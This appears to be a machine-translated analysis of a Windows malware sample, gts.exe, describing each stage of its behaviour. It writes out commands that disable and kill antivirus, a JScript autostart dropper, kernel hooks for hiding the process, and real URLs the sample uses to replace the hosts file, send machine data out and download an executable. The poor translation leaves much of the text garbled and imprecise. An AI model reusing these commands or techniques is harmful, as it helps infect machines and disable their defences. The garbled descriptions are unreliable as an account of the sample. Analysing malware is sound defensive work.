subject: Gts.exe detailed analysis of the virus [print this page] Gts.exe detailed analysis of the virus Gts.exe detailed analysis of the virus
gts.exe detailed analysis of the virus
Subject gts.exe:
Executive cmd / c sc config ekrn start = disabled cancel the service since the launch of NOD32
cmd.exe / c taskkill.exe / im ekrn.exe / f to force the process to terminate ekrn.exe
Forced to terminate egui.exe process
In the% Windir% / boot time to create the name of te% dt.dll file
129 out their own resources, and increase circulation to the contents of each byte 5, written to create the dll in the
Dll into the release of the rundll32.exe and run testall function
Dll files to delete the release of
In the% Windir% create random name. Exe
101 extract its resources, the decoded exe created in writing
Run exe created
Create pcidump.sys drive, and extract their own resources to write 125
Create pcidump services associated file pcidump.sys, start the way for SERVICE_DEMAND_START, and immediately start the service
Services to the . Pcidump send the virus process name, used to hide
Remove pcidump Service
Remove the release of the driver files
Copied to the current virus body% Windir% system32 next
Remove the virus itself, the body image
dll files:
Put right
Find Rising CCENTER.EXE process (also judged Kaspersky)
If not avp.exe shell is borrowed aec.sys, or borrow AsyncMac.sys, if avp.exe, appears bug (change aec.sys property, and then delete AsyncMac.sys)
Remove the drivers aec.sys the file protection attribute (here a bug)
Delete drivers AsyncMac.sys
Create drivers AsyncMac.sys, read their own resources, 101, +5 to decode the contents of each byte, and then create the drive to write to create named AsyncMac services associated file drivers AsyncMac.sys , and start
Open the . KILLPS_Drv
68 kinds of anti-virus software to find the process, if found, then send the control code 2236420, with the process ID to the driver, and delete its related services, and exe files
Stop AsyncMac Service
Delete drivers AsyncMac.sys
Remove Rising related services
Random name. Exe files:
Create XETTETT ...... Mutex, to avoid duplication of infection
ALG and wscsvc shut down the service
Directory permissions for everyone to modify the system
Modify the temporary folder permissions for everyone
Add a registry key CurrentVersion Run the following at RsTray, the value of C: WINDOWS system32 scvhost.exe
Create a thread
In the thread to download http://ff.the88888.com:18185/qvod/host.txt, override the% Windir% drivers etc hosts, and set file attributes to read-only
Waiting on a thread creates a thread to complete before
In the first test the network status thread
Then visit http://tj19.x9wdns.com:2787/q2/tj.html?mac=XX:XX:XX&ver=10830&os=XXX&dtime=2010-8-3
Send data to the remote server
Wait for thread to complete before creating a thread, and then visit a http://tj19.x9wdns.com:2787/q2/tj.html?mac=XX:XX:XX&ver=10830&os=XXX&dtime=2010-8-3
Download the exe from a remote server http://ll.best88888.com:88/C/CXX.exe file, save to the system directory
A smss.exe
Created in the startup directory run.jse
As follows:
var WSH = new ActiveXObject ("WScript.Shell");
var fso = new ActiveXObject ("Scripting.FileSystemObject");
if (fso.FileExists ("c: windows a smss.exe"))
{
WSH.Run ("c: windows a smss.exe");
}
Add run.jse to the self-starting items
pcidump.sys:
Create device Device pcidump
Create a symbolic link DosDevices pcidump
FSD HOOK " FileSystem FastFat" and "NTFS" in the IRP_MJ_CREATE dispatch routine, the process to protect the virus
SSDT HOOK "ZwQuerySystemInfomation" Hide gts.exe process
Done on the disk to restore the system through processing
